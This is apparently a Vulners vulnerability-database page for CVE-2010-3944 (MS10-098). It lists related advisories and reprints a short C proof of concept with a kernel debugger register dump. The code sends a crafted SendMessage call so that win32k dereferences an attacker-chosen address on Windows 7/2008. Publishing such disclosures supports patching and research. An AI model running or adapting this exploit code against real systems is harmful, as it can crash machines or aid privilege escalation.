| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Windows Win32k Pointer Dereferencement PoC (MS10-098) | 18 Dec 201000:00 | – | zdt | |
| CVE-2010-3944 | 17 Dec 201000:00 | – | circl | |
| CVE-2010-3944 | 16 Dec 201019:00 | – | cve | |
| CVE-2010-3944 | 16 Dec 201019:00 | – | cvelist | |
| EUVD-2010-3921 | 7 Oct 202500:30 | – | euvd | |
| Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098) | 17 Dec 201000:00 | – | exploitpack | |
| CVE-2010-3944 | 16 Dec 201019:33 | – | nvd | |
| Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2436673) | 15 Dec 201000:00 | – | openvas | |
| Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2436673) | 15 Dec 201000:00 | – | openvas | |
| Windows Win32k Pointer Dereference | 17 Dec 201000:00 | – | packetstorm |
/*************************************************************************************
* MS10-098
* CVE-2010-3944
*
* Microsoft Windows Win32k pointer dereferencement
*
* --------------------
* Affected Software
* ------------------------
* Microsoft Windows 7 / 2008
*
*
* --------------------
* Consequences
* -----------------------
* An unprivileged user may be able to cause a bugcheck, or possibly execute
* arbitrary code by CSRSS.EXE.
*
*
*
* Credits : Stefan LE BERRE ([email protected])
* Ludo t0ka7a
*
* WebSites : http://www.sysdream.com/
* http://ghostsinthestack.org/
* http://infond.blogspot.com/
* http://twitter.com/hackinparis
*
* kd> r
* eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618 edi=fea00618
* eip=8d72af90 esp=95b54a98 ebp=95b54b00 iopl=0 nv up ei ng nz na pe nc
* cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286
* win32k!xxxRealDefWindowProc+0xf6:
* 8d72af90 c60000 mov byte ptr [eax],0 ds:0023:00013370=??
*
*************************************************************************************/
#include <stdio.h>
#include <windows.h>
#include <Winuser.h>
int main(int argc, char *argv[])
{
SendMessage((HWND) 16,(UINT) 13,0x80000000,0x00013370); // 0x13370 is the deref and 16 is the window handle of #32769
return 0;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation